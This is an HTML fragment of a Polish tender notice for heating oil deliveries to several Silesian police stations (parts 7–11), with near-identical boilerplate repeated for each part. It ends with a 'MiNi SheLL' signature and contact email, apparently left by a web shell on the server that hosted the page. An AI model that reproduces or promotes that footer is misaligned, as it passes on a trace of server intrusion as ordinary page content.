                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KPP Wodzisław Śl., KP Pszów, ul. Paderewskiego 33<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).
8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KPP Zawiercie, KP Szczekociny, ul. Parkowa 4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).
8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KPP Żywiec, KP Jeleśnia, ul. Kazimierza 79<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).
8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>zakup i dostawa oleju opałowego, grzewczego dla KPP Żywiec, KP Rajcza, ul. Górska 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7. Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).
8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b> zakup i dostawa oleju opałowego, grzewczego dla KPP Żywiec, KP Milówka, ul. Kazimierza 120<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiotem zamówienia jest Zakup i dostawa oleju opałowego, grzewczego dla jednostek terenowych Policji garnizonu śląskiego na okres 01.01.2017 r. do 31.12.2017 r.
Uwaga! Dostawy stanowiące przedmiot zamówienia będą wykonywane sukcesywnie na podstawie zleceń od dnia 01.01.2017 r. lub od dnia zawarcia umowy (w przypadku zawarcia umowy po 01.01.2017 r.) do dnia 31.12.2017 r.
2. Wymagane parametry oleju opałowego, grzewczego znajdują się w Szczegółowym opisie przedmiotu zamówienia- stanowiący załącznik nr 9 do SIWZ 
3. Przewidywane zapotrzebowanie na olej opałowy, grzewczy w skali całego zamówienia wynosi 135000 litrów zgodnie z zał. nr 3 do SIWZ, zapotrzebowanie w ramach zadań określa załącznik nr 3 do SIWZ
4. Pojemność zbiorników w danych jednostkach terenowych zawiera zał. nr 3 do SIWZ.
5. Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia określa załącznik nr 2 do SIWZ  projekt umowy.
6. Termin dostawy oleju opałowego, grzewczego nie może przekraczać 48 godzin. Dostawy winny odbywać się w dni robocze w godzinach pracy od 8:00 do 14:30. W szczególnie uzasadnionych przypadkach dostawy oleju opałowego grzewczego mogą mieć miejsce na telefoniczne zgłoszenie Zamawiającego, w dni wolne od pracy, które zostanie niezwłocznie potwierdzone w formie pisemnej.
7.  Zamawiający dopuszcza podwykonawców. W przypadku gdy Wykonawca będzie korzystał z podwykonawców Zamawiający żąda wskazania części zamówienia, które zamierza im powierzyć oraz podania nazw firm podwykonawców oraz dane kontaktowe (załącznik nr 5 do SIWZ). Zapisy dotyczące podwykonawców znajdują się w rozdziale XVII SIWZ i w projekcie umowy (załącznik nr 2 do SIWZ).
 8. UWAGA: maksymalna wartość umowy dla każdego z zadań będzie opiewać na kwotę jaką Zamawiający zamierza przeznaczyć na sfinansowanie zadania podaną na otwarciu ofert. Cenę brutto obliczoną wg Rozdziału X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>09135100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena oferty</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com